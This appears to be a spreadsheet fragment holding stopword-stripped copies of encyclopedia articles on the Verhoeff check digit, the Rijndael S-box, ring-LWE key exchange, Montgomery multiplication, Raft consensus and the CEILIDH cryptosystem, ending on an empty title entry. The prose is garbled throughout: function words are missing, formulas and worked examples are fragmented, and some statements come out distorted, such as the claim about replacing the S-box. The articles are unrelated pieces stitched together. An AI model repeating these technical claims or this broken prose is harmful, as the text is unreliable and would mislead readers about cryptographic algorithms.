mapping {\displaystyle d_{5}} insert previous equation {\displaystyle f(r^{2})\cdot f^{2}(r^{4})\cdot f^{3}(r^{3}s)\cdot f^{4}(s)=e} evaluate permutation quickly {\displaystyle f^{4}(s)=f^{3}(r^{3}s)=f^{2}(r^{4})=f(r^{2})=r^{2}s} {\displaystyle r^{2}s\cdot r^{2}s\cdot r^{2}s\cdot r^{2}s=e} this reflection iteratively multiplied. reflections inverse. {\displaystyle (r^{2}s\cdot r^{2}s)\cdot (r^{2}s\cdot r^{2}s)=e^{2}=e} practice algorithm implemented using simple lookup tables without needing understand generate tables underlying group permutation theory. this properly considered family algorithms, permutations work too. verhoeff's notes particular permutation, given above, special property detecting 95.3% phonetic errors.the strengths algorithm detects transliteration transposition errors, additionally twin, twin jump, jump transposition phonetic errors. main weakness verhoeff algorithm complexity. calculations required cannot easily expressed formula {\displaystyle {\displaystyle \mathbb /10\mathbb lookup tables required easy calculation. similar code damm algorithm, similar qualities. table-based algorithm verhoeff algorithm implemented using three tables: multiplication table inverse table inv, permutation table first table, based multiplication dihedral group simply cayley table group. note group commutative, values d(j,k) d(k, inverse table represents multiplicative inverse digit, value satisfies d(j, inv(j)) permutation table applies permutation digit based position number. this actually single permutation 0)(3 applied iteratively; i.e. p(i+j,n) p(i, p(j,n)). verhoeff checksum calculation performed follows: create array individual digits number, taken right left (rightmost digit etc.). initialize checksum zero. index array starting zero, replace {\displaystyle d(c,p(i{\bmod {8}},n_{i}))} .the original number valid {\displaystyle c=0} generate check digit, append perform calculation: correct check digit {\displaystyle inv(c)} examples references external links detailed description verhoeff algorithm</t>
  </si>
  <si>
    <t>Rijndael S-box</t>
  </si>
  <si>
    <t>rijndael s-box substitution (lookup table) used rijndael cipher, advanced encryption standard (aes) cryptographic algorithm based. forward s-box s-box maps 8-bit input, 8-bit output, s(c). both input output interpreted polynomials gf(2). first, input mapped multiplicative inverse gf(28) gf(2) [x]/(x8 rijndael's finite field. zero, identity, mapped itself. this transformation known nyberg s-box inventor kaisa nyberg. multiplicative inverse transformed using following affine transformation: {\displaystyle {\begin{bmatrix}s_{0}\\s_{1}\\s_{2}\\s_{3}\\s_{4}\\s_{5}\\s_{6}\\s_{7}\end{bmatrix}}={\begin{bmatrix}1&amp;0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\1&amp;1&amp;0&amp;0&amp;0&amp;1&amp;1&amp;1\\1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;1&amp;1\\1&amp;1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;1\\1&amp;1&amp;1&amp;1&amp;1&amp;0&amp;0&amp;0\\0&amp;1&amp;1&amp;1&amp;1&amp;1&amp;0&amp;0\\0&amp;0&amp;1&amp;1&amp;1&amp;1&amp;1&amp;0\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1&amp;1\end{bmatrix}}{\begin{bmatrix}b_{0}\\b_{1}\\b_{2}\\b_{3}\\b_{4}\\b_{5}\\b_{6}\\b_{7}\end{bmatrix}}+{\begin{bmatrix}1\\1\\0\\0\\0\\1\\1\\0\end{bmatrix}}} [s7, s-box output [b7, multiplicative inverse vector. this affine transformation multiple rotations byte vector, addition operation: {\displaystyle s=b\oplus (b\lll 1)\oplus (b\lll 2)\oplus (b\lll 3)\oplus (b\lll 4)\oplus 63_{16}} represents multiplicative inverse, {\displaystyle \oplus bitwise operator, {\displaystyle \lll left bitwise circular shift, constant 6316 011000112 given hexadecimal. equivalent formulation affine transformation {\displaystyle s_{i}=b_{i}\oplus b_{(i+4)\operatorname {mod} 8}\oplus b_{(i+5)\operatorname {mod} 8}\oplus b_{(i+6)\operatorname {mod} 8}\oplus b_{(i+7)\operatorname {mod} 8}\oplus c_{i}} arrays, 011000112, subscripts indicate reference indexed bit.another equivalent {\displaystyle s=\left(b\times 31_{10}\mod {257_{10}}\right)\oplus 99_{10}} {\displaystyle \times polynomial multiplication {\displaystyle {\displaystyle 31_{10}} taken arrays. inverse s-box inverse s-box simply s-box reverse. example, inverse s-box b816 9a16. calculated first calculating inverse affine transformation input value, followed multiplicative inverse. inverse affine transformation follows: {\displaystyle {\begin{bmatrix}b_{0}\\b_{1}\\b_{2}\\b_{3}\\b_{4}\\b_{5}\\b_{6}\\b_{7}\end{bmatrix}}={\begin{bmatrix}0&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0\\0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;0&amp;1\\1&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;0\\0&amp;1&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0\\0&amp;0&amp;1&amp;0&amp;1&amp;0&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;0&amp;1&amp;0&amp;0\\0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;1&amp;0\end{bmatrix}}{\begin{bmatrix}s_{0}\\s_{1}\\s_{2}\\s_{3}\\s_{4}\\s_{5}\\s_{6}\\s_{7}\end{bmatrix}}+{\begin{bmatrix}1\\0\\1\\0\\0\\0\\0\\0\end{bmatrix}}} inverse affine transformation also represents multiple rotations byte vector, addition operation: {\displaystyle b=(s\lll 1)\oplus (s\lll 3)\oplus (s\lll 6)\oplus 5_{16}} {\displaystyle \oplus bitwise operator, {\displaystyle \lll left bitwise circular shift, constant 000001012 given hexadecimal. design criteria rijndael s-box specifically designed resistant linear differential cryptanalysis. this done minimizing correlation linear transformations input/output bits, time minimizing difference propagation probability. rijndael s-box replaced rijndael cipher, defeats suspicion backdoor built cipher exploits static s-box. authors claim rijndael cipher structure provide enough resistance differential linear cryptanalysis s-box "average" correlation difference propagation properties used. example implementation language following code calculates s-box: references</t>
  </si>
  <si>
    <t>Ring learning with errors key exchange</t>
  </si>
  <si>
    <t>cryptography, public exchange algorithm cryptographic algorithm allows parties create share secret key, encrypt messages themselves. ring learning errors exchange (rlwe-kex) class public exchange algorithms designed secure adversary possesses quantum computer. this important public algorithms today easily broken quantum computer computers implemented. rlwe-kex post-quantum cryptographic algorithms based difficulty solving certain mathematical problems involving lattices. unlike older lattice based cryptographic algorithms, rlwe-kex provably reducible known hard problem lattices. background since 1980s security cryptographic exchanges digital signatures internet primarily based small number public algorithms. security algorithms based similarly small number computationally hard problems classical computing. these problems difficulty factoring product carefully chosen prime numbers, difficulty compute discrete logarithms carefully chosen finite field, difficulty computing discrete logarithms carefully chosen elliptic curve group. these problems difficult solve classical computer (the type computer world known since 1940s today) rather easily solved relatively small quantum computer using thousand bits memory. there optimism computer industry larger scale quantum computers available around 2030. quantum computer sufficient size built, public algorithms based three classically hard problems would insecure. this public cryptography used today secure internet websites, protect computer login information, prevent computers accepting malicious software. cryptography susceptible attack quantum computer referred quantum safe, post-quantum cryptography. class quantum resistant cryptographic algorithms based concept called "learning errors" introduced oded regev 2005. specialized form learning errors operates within ring polynomials finite field. this specialized form called ring learning errors rlwe. there variety cryptographic algorithms work using rlwe paradigm. there public-key encryption algorithms, homomorphic encryption algorithms, rlwe digital signature algorithms addition public key, exchange algorithm presented article exchange algorithm type public algorithm establishes shared secret communicants communications link. classic example exchange diffie–hellman exchange. exchange consists transmission line transmission link. diffie–hellman elliptic curve diffie–hellman popular exchange algorithms. rlwe exchange designed "quantum safe" replacement widely used diffie–hellman elliptic curve diffie–hellman exchanges used secure establishment secret keys untrusted communications channels. like diffie–hellman elliptic curve diffie–hellman, ring-lwe exchange provides cryptographic property called "forward secrecy"; reduce effectiveness mass surveillance programs ensure long term secret keys compromised would enable bulk decryption. introduction starting prime integer ring-lwe exchange works ring polynomials modulo polynomial {\displaystyle \phi (x)} coefficients field integers (i.e. ring {\displaystyle r_{q}:=z_{q}[x]/\phi (x)} multiplication addition polynomials work usual fashion results multiplication reduced {\displaystyle \phi (x)} idea using ring exchange first proposed filed university cincinnati 2011 jintai ding. idea comes associativity matrix multiplications, errors used provide security. paper appeared 2012 provisional patent application filed 2012. security protocol proven based hardness solving problem. 2014, peikert presented key-transport scheme following basic idea ding's, idea sending additional 1-bit signal rounding ding's construction also used. "new hope" implementation selected google's post-quantum experiment, uses peikert's scheme variation error distribution. somewhat greater bits security, singh presents parameters 6956-bit public keys peikert's scheme. corresponding private would roughly 14,000 bits. rlwe version classic variant diffie–hellman exchange later published zhang 2014. security exchanges directly related problem finding approximate short vectors ideal lattice. this article closely follow rlwe work ding simple provably secure exchange scheme based learning errors problem". presentation typical polynomial expressed {\displaystyle a(x)=a_{0}+a_{1}x+a_{2}x^{2}+\cdots +a_{n-3}x^{n-3}+a_{n-2}x^{n-2}+a_{n-1}x^{n-1}} coefficients polynomial, ais, integers polynomial {\displaystyle \phi (x)} cyclotomic polynomial. when power {\displaystyle \phi (x)=x^{n}+1.} rlwe-kex uses polynomials considered "small" respect measure called "infinity norm." infinity norm polynomial simply value largest coefficient polynomial coefficients considered integers rather {\displaystyle (i.e.from {−(q 1)/2,..., 1)/2} algorithm's security depends ability generate random polynomials small respect infinity norm. this done simply randomly generating coefficients polynomial (sn-1, ..., guaranteed likely small. there common ways this: using uniform sampling coefficients small polynomial uniformly sampled small coefficients. integer much less randomly choose coefficients set: polynomial small respect bound (b). singh suggest using thus coefficients would chosen using discrete gaussian sampling value coefficients randomly chosen sampling 1)/2 1)/2 according discrete gaussian distribution mean distribution parameter references describe full detail accomplished. complicated uniform sampling allows proof security algorithm. overview gaussian sampling found presentation peikert.for rest article, random small polynomials sampled according distribution simply specified further prime congruent other cases thoroughly discussed toolkit ring-lwe cryptography" singh's "even more practical exchange internet using lattice cryptography." another paper singh. fixed public polynomial, a(x), shared users network. deterministically generated cryptographically secure source. given a(x) stated, randomly choose small polynomials s(x) e(x) "private key" public exchange. corresponding public polynomial p(x) a(x)s(x) 2e(x). exchange exchange take place devices. there initiator exchange designated respondent designated (r). both know a(x), ability generate small polynomials according distribution {\displaystyle \chi _{\alpha parameter {\displaystyle \alpha distribution {\displaystyle \chi _{\alpha usually discrete gaussian distribution ring {\displaystyle r_{q}=zq[x]/\phi (x)} description follows contain explanation exchange results ends link. rather, succinctly specifies steps taken. thorough understanding exchange results initiator responder key, reader look referenced work ding al.the exchange begins initiator following: initiation: generate polynomials {\displaystyle s_{i}} {\displaystyle e_{i}} small coefficients sampling distribution {\displaystyle \chi _{\alpha compute {\displaystyle p_{i}=as_{i}+2e_{i}.} initiator sends polynomial {\displaystyle p_{i}} responder.response: generate polynomials {\displaystyle s_{r}} {\displaystyle e_{r}} small coefficients sampling distribution {\displaystyle \chi _{\alpha compute {\displaystyle p_{r}=as_{r}+2e_{r}} generate small {\displaystyle e'_{r}} {\displaystyle \chi _{\alpha compute {\displaystyle k_{r}=p_{i}s_{r}+2e'_{r}} then {\displaystyle k_{r}=as_{i}s_{r}+2e_{i}s_{r}+2e'_{r}} signal function {\displaystyle \operatorname {sig} find {\displaystyle w=\operatorname {sig} (k_{r})} this computed applying {\displaystyle sig} function coefficient {\displaystyle k_{r}} respondent side's stream {\displaystyle sk_{r}=\operatorname {mod} _{2}(k_{r},w)} calculated, based reconciliation information {\displaystyle polynomial {\displaystyle k_{r}} respondent sends {\displaystyle p_{r}} {\displaystyle initiator.finish: receive {\displaystyle p_{r}} {\displaystyle responder. sample {\displaystyle e'_{i}} {\displaystyle \chi _{\alpha compute {\displaystyle k_{i}=p_{r}s_{i}+2e'_{i}=as_{i}s_{r}+2e_{r}s_{i}+2e'_{i}} initiator side's stream produced {\displaystyle sk_{i}=\operatorname {mod} _{2}(k_{i},w)} reconciliation information {\displaystyle polynomial {\displaystyle k_{i}} exchange, {\displaystyle \operatorname {sig} signal function defined below: define subset {\displaystyle \mathbf :=\{-\lfloor {\frac {q}{4}}\rfloor ,\ldots ,\lfloor {\frac {q}{4}}\rceil {\displaystyle zq=\{-{\frac {q-1}{2}},\ldots ,{\frac {q-1}{2}}\}} here, {\displaystyle \lfloor .\rfloor {\displaystyle \lfloor .\rceil denotes floor rounding nearest integer respectively. function {\displaystyle \operatorname {sig} characteristic function complement {\displaystyle \operatorname {sig} :zq\rightarrow \{0,1\}} {\displaystyle \operatorname {sig} (v)={\begin{cases}0,&amp;{\text{if }}v\in e\\1,&amp;{\text{if }}v\notin e.\end{cases}}} {\displaystyle \operatorname {mod} _{2}} operation eliminate error terms defined follows: {\displaystyle \operatorname {mod} _{2}(v,w)={\biggl (}v+w.{\frac {q-1}{2}}{\biggr )}{\bmod {q}}{\bmod {2}}} note values {\displaystyle k_{i}} {\displaystyle k_{r}} approximately equal. order extract shared using approximate equal values, reconciliation function, also known signal function used. this function indicates region coefficient polynomial {\displaystyle {\displaystyle r_{q}} lies helps make sure error terms {\displaystyle k_{r}} {\displaystyle k_{i}} result different operations. methods reconciliation string generation depends specific rlwe-kex scheme question. some method based modular arithmetic, others based high-dimension geometry.if exchange worked properly, initiator's string respondent's string same. depending specifics parameters chosen, extremely small probability exchange fail produce key. parameters exchange chosen make probability failure exchange small; much less probability undetectable garbles device failures. parameter choices rlwe-kex exchange presented worked ring polynomials degree less polynomial {\displaystyle \phi (x)} presentation assumed power prime congruent (mod 2n). following guidance given peikert's paper, singh suggested sets parameters rlwe-kex. bits security, 512, 25601, {\displaystyle \phi (x)=x^{512}+1} bits security, 1024, 40961, 1024 {\displaystyle \phi (x)=x^{1024}+1} because exchange uses random sampling fixed bounds small probability exchange fail produce initiator responder. assume gaussian parameter {\textstyle {\frac {8}{\sqrt {2\pi }}}} uniform sampling bound (see singh), probability agreement failure less 2−71 128-bit secure parameters less 2−91 256-bit secure parameters. november 2015 paper, alkim, ducas, pöppelmann, schwabe recommend following parameters 1024, =12289, {\displaystyle \phi (x)} x1024 this represents reduction public size 1024 parameters singh, submitted nist's post-quantum cryptography standardization project name newhope. also november 2015 paper, alkim, ducas, pöppelmann schwabe recommend choice base polynomial exchange a(x) either generated randomly secure random number generator exchange created verifiable fashion using "nothing sleeve" nums technique. example parameters generated prime numbers internet exchange (rfc 2409) embed digits mathematical constant digital representation prime number. their first method prevents amortization attack costs across many exchanges risk leaving open possibility hidden attack like described bernstein nist elliptic curves. nums approach open amortization generally avoids bernstein attack common mathematical constants used. exchange security security exchange based underlying hardness ring learning errors problem proven hard worst case solution shortest vector problem (svp) ideal lattice. best method gauge practical security given lattice parameters lattice reduction algorithm. according algorithm exchange parameters listed provide greater bits security, respectively. implementations 2014 douglas stebila made patch openssl 1.0.1f. based work others published "post-quantum exchange protocol ring learning errors problem." software implementing work singh found github https://github.com/vscrypto/ringlwe. other approaches variant approach described authenticated version work zhang, zhang, ding, snook dagdelen paper, "post quantum authenticated exchange ideal lattices." concept creating called diffie–hellman-like exchange using lattices reconciliation function appears first presented french researchers aguilar, gaborit, lacharme, schrek, zemor pqcrypto 2010 talk, "noisy diffie–hellman protocols."in november 2015, alkim, ducas, pöppelmann, schwabe built prior work peikert used believe conservative costing lattice attacks recommend parameters. software based work alkim, ducas, pöppelmann, schwabe found github https://github.com/tpoeppelmann/newhope also post-quantum cryptography lattice-based cryptography ideal lattice cryptography ring learning errors signature ring learning errors references</t>
  </si>
  <si>
    <t>Montgomery modular multiplication</t>
  </si>
  <si>
    <t>modular arithmetic computation, montgomery modular multiplication, commonly referred montgomery multiplication, method performing fast modular multiplication. introduced 1985 american mathematician peter montgomery.montgomery modular multiplication relies special representation numbers called montgomery form. algorithm uses montgomery forms efficiently compute montgomery form efficiency comes avoiding expensive division operations. classical modular multiplication reduces double-width product using division keeping remainder. this division requires quotient digit estimation correction. montgomery form, contrast, depends constant coprime division necessary montgomery multiplication division constant chosen division easy, significantly improving speed algorithm. practice, always power two, since division powers implemented shifting. need convert montgomery form product montgomery form means computing single product montgomery multiplication slower conventional barrett reduction algorithms. however, performing many multiplications row, modular exponentiation, intermediate results left montgomery form. then initial final conversions become negligible fraction overall computation. many important cryptosystems diffie–hellman exchange based arithmetic operations modulo large number, cryptosystems, computations using montgomery multiplication power faster available alternatives. modular arithmetic denote positive integer modulus. quotient ring z/nz consists residue classes modulo elements sets form {\displaystyle \{a+kn\colon k\in \mathbf \},} ranges across integers. each residue class integers difference integers divisible (and residue class maximal respect property; integers left residue class unless would violate divisibility condition). residue class corresponding denoted equality residue classes called congruence denoted {\displaystyle {\bar {a}}\equiv {\bar {b}}{\pmod {n}}.} storing entire residue class computer impossible residue class infinitely many elements. instead, residue classes stored representatives. conventionally, representatives integers integer, representative written when writing congruences, common identify integer residue class represents. with convention, equality written arithmetic residue classes done first performing integer arithmetic representatives. output integer operation determines residue class, output modular operation determined computing residue class's representative. example, residue classes computed finding integer determining integer whose difference multiple case, integer montgomery form integers range range difference range determining representative requires subtraction addition (respectively) however, product range storing intermediate integer product requires twice many bits either efficiently determining representative requires division. mathematically, integer congruent expressed applying euclidean division theorem: {\displaystyle ab=qn+r,} quotient {\displaystyle \lfloor ab/n\rfloor remainder, interval remainder determining done computing subtracting example, product determined computing {\displaystyle 7\cdot 15=105} dividing {\displaystyle \lfloor 105/17\rfloor subtracting {\displaystyle 105-6\cdot 17=105-102=3} because computation requires division, undesirably expensive computer hardware. montgomery form different expressing elements ring modular products computed without expensive divisions. while divisions still necessary, done respect different divisor this divisor chosen power two, division replaced shifting, whole number machine words, division replaced omitting words. these divisions fast, cost computing modular products using montgomery form cost computing ordinary products. auxiliary modulus must positive integer gcd(r, computational purposes also necessary division reduction modulo inexpensive, modulus useful modular multiplication unless montgomery form residue class respect representative residue class example, suppose 100. montgomery forms 1500 addition subtraction montgomery form ordinary modular addition subtraction distributive law: {\displaystyle ar+br=(a+b)r,} {\displaystyle ar-br=(a-b)r.} this consequence fact that, gcd(r, multiplication isomorphism additive group z/nz. example, montgomery form becomes multiplication montgomery form, however, seemingly complicated. usual product represent product extra factor {\displaystyle (ar{\bmod {n}})(br{\bmod {n}}){\bmod {n}}=(abr)r{\bmod {n}}.} computing products montgomery form requires removing extra factor while division cheap, intermediate product n)(br divisible modulo operation destroyed property. instance, product montgomery forms modulo product since divisible 100, additional effort required remove extra factor removing extra factor done multiplying integer (mod whose residue class modular inverse then, working modulo {\displaystyle (ar{\bmod {n}})(br{\bmod {n}})r'\equiv (ar)(br)r^{-1}\equiv (ab)r{\pmod {n}}.} integer exists assumption coprime. constructed using extended euclidean algorithm. extended euclidean algorithm efficiently determines integers satisfy bézout's identity: and: {\displaystyle rr'-nn'=1.} this shows possible multiplication montgomery form. straightforward algorithm multiply numbers montgomery form therefore multiply integers reduce modulo example, multiply modulo montgomery form, 100, compute product above. extended euclidean algorithm implies 8⋅100 47⋅17 multiply reduce modulo this montgomery form expected. redc algorithm while algorithm correct, slower multiplication standard representation need multiply divide montgomery reduction, also known redc, algorithm simultaneously computes product reduces modulo quickly naïve method. unlike conventional modular reduction, focuses making number smaller montgomery reduction focuses making number divisible adding small multiple chosen cancel residue modulo dividing result yields much smaller number. this number much smaller nearly reduction modulo computing reduction modulo requires final conditional subtraction. because computations done using reduction divisions respect algorithm runs faster straightforward modular reduction division. function redc input: integers gcd(r, integer integer range output: integer range tr−1 r)n′) return else return function algorithm correct, first observe chosen precisely divisible number divisible congruent zero have: {\displaystyle t+mn\equiv t+(((t{\bmod {r}})n'){\bmod {r}})n\equiv t+tn'n\equiv t-t\equiv 0{\pmod {r}}.} therefore, integer. second, output either congruent prove output congruent tr−1 suffices prove modulo satisfies: {\displaystyle t\equiv (t+mn)r^{-1}\equiv tr^{-1}+(mr^{-1})n\equiv tr^{-1}{\pmod {n}}.} therefore, output correct residue class. third, therefore 2rn. hence less integer, puts range therefore, reducing desired range requires single subtraction, algorithm's output lies correct range. redc compute product modulo first convert montgomery form multiply integers above. then apply redc 100, first step sets second step sets 100. notice 1100, multiple expected. less final result agrees computation previous section. another example, consider product using extended euclidean algorithm, compute montgomery forms respectively. their product input redc, since 170, assumptions redc satisfied. redc, then 130, because montgomery form arithmetic montgomery form many operations interest modulo expressed equally well montgomery form. addition, subtraction, negation, comparison equality, multiplication integer montgomery form, greatest common divisors done standard algorithms. jacobi symbol calculated {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}={\big (}{\tfrac {ar}{n}}{\big )}/{\big (}{\tfrac {r}{n}}{\big long {\displaystyle {\big (}{\tfrac {r}{n}}{\big stored. when arithmetic operations expressed terms redc. this assumption implies product representatives less exact hypothesis necessary redc generate correct output. particular, product redc((ar n)(br n)). combined operation multiplication redc often called montgomery multiplication. conversion montgomery form done computing redc((a n)(r2 n)). conversion montgomery form done computing redc(ar modular inverse redc((ar n)−1(r3 n)). modular exponentiation done using exponentiation squaring initializing initial product montgomery representation replacing multiply square steps montgomery multiplies. performing operations requires knowing least when power small positive integer computed hensel's lemma: inverse modulo computed naïve algorithm (for instance, inverse hensel's lemma used repeatedly find inverse modulo higher higher powers stopping inverse modulo known; negation inverse. constants generated redc(r2 redc((r2 n)(r2 n)). fundamental operation compute redc product. when standalone redc needed, computed redc product place direct reduction modulo necessary precomputation montgomery arithmetic multiprecision integers most cryptographic applications require numbers hundreds even thousands bits long. such numbers large stored single machine word. typically, hardware performs multiplication base performing larger multiplications requires combining several small multiplications. base typically microelectronic applications, 8-bit firmware, software applications. redc algorithm requires products modulo typically redc used compute products. however, power variant redc requires products machine word sized integers. suppose positive multi-precision integers stored little endian, stored array x[0], ..., x[i] x[i] algorithm begins multiprecision integer reduces word time. first appropriate multiple added make divisible then multiple added make divisible eventually divisible division algorithm place redc computation function multiprecisionredc input: integer gcd(b, stored array words, integer --thus, logb integer (mod integer range stored array words. output: integer tr−1 (mod stored array words. (extra carry word) --loop1- make divisible bi+1 t[i] --loop2- word n[j] carry earlier, find carry n[j] --loop3- continue carrying s[i] return else return function final comparison subtraction done standard algorithms. algorithm correct essentially reasons redc correct. each time loop, chosen t[i] mn[0] divisible then mnbi added because quantity zero adding affect value denotes value computed iteration loop, algorithm sets bi)n. because multiprecisionredc redc produce output, choice redc algorithm would make. last word (and consequently s[p]), used hold carry, initial reduction result bound result range follows extra carry word avoided completely known advance typical binary implementation, equivalent saying carry word avoided number bits smaller number bits otherwise, carry either zero one. depending upon processor, possible store word carry flag instead full-sized word. possible combine multiprecision multiplication redc single algorithm. this combined algorithm usually called montgomery multiplication. several different implementations described koç, acar, kaliski. algorithm little words storage (plus carry bit). example, 997, 1000. suppose 271. montgomery representations 314000 271000 813. compute 765846. initial input multiprecisionredc number represented extended euclidean algorithm says −299 ------- 0485670 (after first iteration first loop) 0485670 0485670 0487670 (after first iteration second loop) 0487670 0487670 0487670 ------- 0087670 (after first iteration first loop) 0067670 0067670 0067470 (after first iteration second loop) 0067480 0067480 ------- 0007480 (after first iteration first loop) 0007480 0007480 0007400 (after first iteration second loop) 0007401 therefore, final comparison subtraction, 1047. final subtraction yields number since montgomery representation 349000 expected result. when working base determining correct stage particularly easy: current working even, zero odd, one. furthermore, step multiprecisionredc requires knowing lowest bit, montgomery multiplication easily combined carry-save adder. side-channel attacks because montgomery reduction avoids correction steps required conventional division quotient digit estimates inaccurate, mostly free conditional branches primary targets timing power side-channel attacks; sequence instructions executed independent input operand values. exception final conditional subtraction modulus, easily modified always subtract something, either modulus zero) make resistant. course necessary ensure exponentiation algorithm built around multiplication primitive also resistant. also barrett reduction references external links henry warren, (july 2012). "theory practice montgomery multiplication". citeseerx 10.1.1.450.6124.</t>
  </si>
  <si>
    <t>Raft (algorithm)</t>
  </si>
  <si>
    <t>raft consensus algorithm designed alternative paxos family algorithms. meant understandable paxos means separation logic, also formally proven safe offers additional features. raft offers generic distribute state machine across cluster computing systems, ensuring node cluster agrees upon series state transitions. number open-source reference implementations, full-specification implementations c++, java, scala. named reliable, replicated, redundant, fault-tolerant.raft byzantine fault tolerant algorithm: nodes trust elected leader. basics raft achieves consensus elected leader. server raft cluster either leader follower, candidate precise case election (leader unavailable). leader responsible replication followers. regularly informs followers existence sending heartbeat message. each follower timeout (typically expects heartbeat leader. timeout reset receiving heartbeat. heartbeat received follower changes status candidate starts leader election. approach consensus problem raft raft implements consensus leader approach. cluster elected leader fully responsible managing replication servers cluster. means leader decide entries' placement establishment data flow servers without consulting servers. leader leads fails disconnects, case leader elected. consensus problem decomposed raft relatively independent subproblems listed below. leader election when existing leader fails algorithm initializes, leader needs elected. case, term starts cluster. term arbitrary period time server leader needs elected. each term starts leader election. election completed successfully (i.e. single leader elected) term keeps going normal operations orchestrated leader. election failure, term starts, election. leader election started candidate server. server becomes candidate receives communication leader period called election timeout, assumes acting leader anymore. starts election increasing term counter, voting leader, sending message servers requesting vote. server vote term, first-come-first-served basis. candidate receives message another server term number larger candidate's current term, candidate's election defeated candidate changes follower recognizes leader legitimate. candidate receives majority votes, becomes leader. neither happens, e.g., split vote, term starts, election begins.raft uses randomized election timeout ensure split vote problems resolved quickly. this reduce chance split vote servers become candidates time: single server time out, election, become leader send heartbeat messages servers followers become candidates. replication leader responsible replication. accepts client requests. each client request consists command executed replicated state machines cluster. after appended leader's entry, requests forwarded followers appendentries messages. case unavailability followers, leader retries appendentries messages indefinitely, entry eventually stored followers. once leader receives confirmation majority followers entry replicated, leader applies entry local state machine, request considered committed. this event also commits previous entries leader's log. once follower learns entry committed, applies entry local state machine. this ensures consistency logs servers cluster, ensuring safety rule matching respected. case leader crash, logs left inconsistent, logs leader fully replicated cluster. leader handle inconsistency forcing followers duplicate log. followers, leader compare follower, find last entry agree, delete entries coming critical entry follower replace entries. this mechanism restore consistency cluster subject failures. safety safety rules raft raft guarantees safety properties election safety: leader elected given term. leader append-only: leader append entries logs neither overwrite delete entries). matching: logs contain entry index term, logs identical entries given index. leader completeness: entry committed given term present logs leaders since term state machine safety: server applied particular entry state machine, server apply different command log.the first four rules guaranteed details algorithm described previous section. state machine safety guaranteed restriction election process. state machine safety this rule ensured simple restriction: candidate can't election unless contains committed entries. order elected, candidate contact majority cluster, given rules logs committed, means every committed entry going present least servers candidates contact. raft determines logs (carried distinct servers) up-to-date comparing index term last entries logs. logs last entry different terms, later term up-to-date. logs term, whichever longer up-to-date. raft, request candidate voter includes information candidate's log. up-to-date candidate's log, voter denies vote candidate. this implementation ensures state machine safety rule. follower crashes follower crashes, appendentries vote requests sent servers fail. such failures handled servers trying indefinitely reach downed follower. follower restarts, pending requests complete. request already taken account failure, restarted follower ignore timing availability timing critical raft elect maintain steady leader time, order perfect availability cluster. stability ensured respecting timing requirement algorithm :broadcasttime electiontimeout mtbf broadcasttime average time takes server send request every server cluster receive responses. relative infrastructure used. mtbf (mean time between failures) average time failures server. also relative infrastructure. electiontimeout described leader election section. something programmer must choose.typical numbers values broadcasttime, implies programmer sets electiontimeout somewhere take several weeks months single server failures, means values sufficient stable cluster. production raft cockroachdb uses raft replication layer. mongodb uses variant raft replication set. tidb uses raft storage engine tikv. references external links official website list implementations</t>
  </si>
  <si>
    <t>CEILIDH</t>
  </si>
  <si>
    <t>ceilidh public cryptosystem based discrete logarithm problem algebraic torus. this idea first introduced alice silverberg karl rubin 2003; silverberg named ceilidh cat. main advantage system reduced size keys security basic schemes. algorithms parameters {\displaystyle prime power. integer {\displaystyle chosen torus {\displaystyle t_{n}} explicit rational parametrization. {\displaystyle \phi _{n}(q)} divisible prime {\displaystyle {\displaystyle \phi _{n}} {\displaystyle n^{th}} cyclotomic polynomial. {\displaystyle m=\phi (n)} {\displaystyle \phi euler function. {\displaystyle \rho :t_{n}(\mathbb _{q})\rightarrow {\mathbb _{q}}^{m}} birational inverse {\displaystyle \psi choose {\displaystyle \alpha t_{n}} order {\displaystyle {\displaystyle g=\rho (\alpha agreement scheme this scheme based diffie-hellman agreement. alice chooses random number {\displaystyle {\pmod {\phi _{n}(q)}}} computes {\displaystyle p_{a}=\rho (\psi (g)^{a})\in \mathbb _{q}^{m}} sends bob. chooses random number {\displaystyle {\pmod {\phi _{n}(q)}}} computes {\displaystyle p_{b}=\rho (\psi (g)^{b})\in \mathbb _{q}^{m}} sends alice. alice computes {\displaystyle \rho (\psi (p_{b}))^{a})\in \mathbb _{q}^{m}} computes {\displaystyle \rho (\psi (p_{a}))^{b})\in \mathbb _{q}^{m}} {\displaystyle \psi \circ \rho identity, thus {\displaystyle \rho (\psi (p_{b}))^{a})=\rho (\psi (p_{a}))^{b})=\rho (\psi (g)^{ab})} shared secret alice bob. encryption scheme this scheme based elgamal encryption. generation alice chooses random number {\displaystyle {\pmod {\phi _{n}(q)}}} private key. resulting public {\displaystyle p_{a}=\rho (\psi (g)^{a})\in \mathbb _{q}^{m}} encryption message {\displaystyle element {\displaystyle \mathbb _{q}^{m}} chooses random integer {\displaystyle range {\displaystyle 1\leq k\leq l-1} computes {\displaystyle \gamma =\rho (\psi (g)^{k})\in \mathbb _{q}^{m}} {\displaystyle \delta =\rho (\psi (m)\psi (p_{a})^{k})\in \mathbb _{q}^{m}} sends ciphertext {\displaystyle (\gamma ,\delta alice. decryption alice computes {\displaystyle m=\rho (\psi (\delta )\psi (\gamma )^{-a})} security ceilidh scheme based elgamal scheme thus similar security properties. computational diffie-hellman assumption holds underlying cyclic group {\displaystyle encryption function one-way. decisional diffie-hellman assumption (ddh) holds {\displaystyle ceilidh achieves semantic security. semantic security implied computational diffie-hellman assumption alone. decisional diffie-hellman assumption discussion groups assumption believed hold. ceilidh encryption unconditionally malleable, therefore secure chosen ciphertext attack. example, given encryption {\displaystyle (c_{1},c_{2})} (possibly unknown) message {\displaystyle easily construct valid encryption {\displaystyle (c_{1},2c_{2})} message {\displaystyle references rubin, silverberg, (2003). "torus-based cryptography". boneh, (ed.). advances cryptology crypto 2003. lecture notes computer science. vol. 2729. springer, berlin, heidelberg. 349–365. doi:10.1007/978-3-540-45146-4_21. isbn 9783540406747. external links torus-based cryptography: paper introducing concept silverberg's university page).</t>
  </si>
  <si>
    <t>Porn Wikileaks</t>
  </si>
